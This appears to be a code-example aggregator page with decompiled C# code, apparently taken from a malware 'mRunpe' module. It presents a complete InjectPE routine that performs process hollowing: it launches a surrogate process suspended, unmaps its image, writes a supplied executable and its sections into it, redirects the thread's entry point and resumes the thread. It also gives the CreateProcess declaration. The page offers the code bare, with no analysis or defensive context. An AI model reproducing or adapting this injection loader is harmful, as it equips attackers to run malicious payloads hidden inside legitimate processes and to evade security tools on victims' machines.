C# (CSharp) System_Configuration mRunpe.STARTUPINFO 예제들

예제 #1

 // Token: 0x0600009E RID: 158 RVA: 0x000097EC File Offset: 0x000079EC
 public static bool InjectPE(byte[] bytes, string surrogateProcess, string optionalArguments = "")
 {
     try
     {
         IntPtr             zero        = IntPtr.Zero;
         IntPtr[]           array       = new IntPtr[4];
         mRunpe.STARTUPINFO startupinfo = default(mRunpe.STARTUPINFO);
         int    num   = BitConverter.ToInt32(bytes, 60);
         int    num2  = (int)BitConverter.ToInt16(bytes, num + 6);
         IntPtr value = new IntPtr(BitConverter.ToInt32(bytes, num + 84));
         startupinfo.cb          = Strings.Len(startupinfo);
         startupinfo.wShowWindow = 0;
         startupinfo.dwFlags     = 257;
         Process process = new Process();
         process.StartInfo.CreateNoWindow = false;
         if (!string.IsNullOrEmpty(optionalArguments))
         {
             surrogateProcess = surrogateProcess + " " + optionalArguments;
         }
         if (!mRunpe.CreateProcess(null, new StringBuilder(surrogateProcess), zero, zero, false, 4, zero, null, ref startupinfo, array))
         {
             return(false);
         }
         uint[] array2 = new uint[179];
         array2[0] = 65538u;
         if (mRunpe.GetThreadContext(array[1], array2))
         {
             IntPtr baseAddr = new IntPtr((long)((ulong)array2[41] + 8UL));
             IntPtr zero2    = IntPtr.Zero;
             IntPtr value2   = new IntPtr(4);
             IntPtr zero3    = IntPtr.Zero;
             if (mRunpe.ReadProcessMemory(array[0], baseAddr, ref zero2, (int)value2, ref zero3) && (ulong)mRunpe.NtUnmapViewOfSection(array[0], zero2) == 0UL)
             {
                 IntPtr intPtr        = new IntPtr(BitConverter.ToInt32(bytes, num + 52));
                 IntPtr intPtr2       = new IntPtr(BitConverter.ToInt32(bytes, num + 80));
                 IntPtr lpBaseAddress = mRunpe.VirtualAllocEx(array[0], intPtr, intPtr2, 12288, 64);
                 int    lpNumberOfBytesWritten;
                 mRunpe.WriteProcessMemory(array[0], lpBaseAddress, bytes, (uint)((int)value), lpNumberOfBytesWritten);
                 int num3 = num2 - 1;
                 int num4 = 0;
                 int num5 = num3;
                 for (int i = num4; i <= num5; i++)
                 {
                     int[] array3 = new int[10];
                     Buffer.BlockCopy(bytes, num + 248 + i * 40, array3, 0, 40);
                     byte[] array4 = new byte[array3[4] - 1 + 1];
                     Buffer.BlockCopy(bytes, array3[5], array4, 0, array4.Length);
                     intPtr2 = new IntPtr(lpBaseAddress.ToInt32() + array3[3]);
                     intPtr  = new IntPtr(array4.Length);
                     mRunpe.WriteProcessMemory(array[0], intPtr2, array4, (uint)((int)intPtr), lpNumberOfBytesWritten);
                 }
                 intPtr2 = new IntPtr((long)((ulong)array2[41] + 8UL));
                 intPtr  = new IntPtr(4);
                 mRunpe.WriteProcessMemory(array[0], intPtr2, BitConverter.GetBytes(lpBaseAddress.ToInt32()), (uint)((int)intPtr), lpNumberOfBytesWritten);
                 array2[44] = (uint)(lpBaseAddress.ToInt32() + BitConverter.ToInt32(bytes, num + 40));
                 mRunpe.SetThreadContext(array[1], array2);
             }
         }
         Thread.Sleep(1000);
         mRunpe.ResumeThread(array[1]);
     }
     catch (Exception ex)
     {
         return(false);
     }
     return(true);
 }

예제 #2

 private static extern bool CreateProcess(string appName, StringBuilder commandLine, IntPtr procAttr, IntPtr thrAttr, [MarshalAs(UnmanagedType.Bool)] bool inherit, int creation, IntPtr env, string curDir, [In] ref mRunpe.STARTUPINFO lpStartupInfo, IntPtr[] pInfo);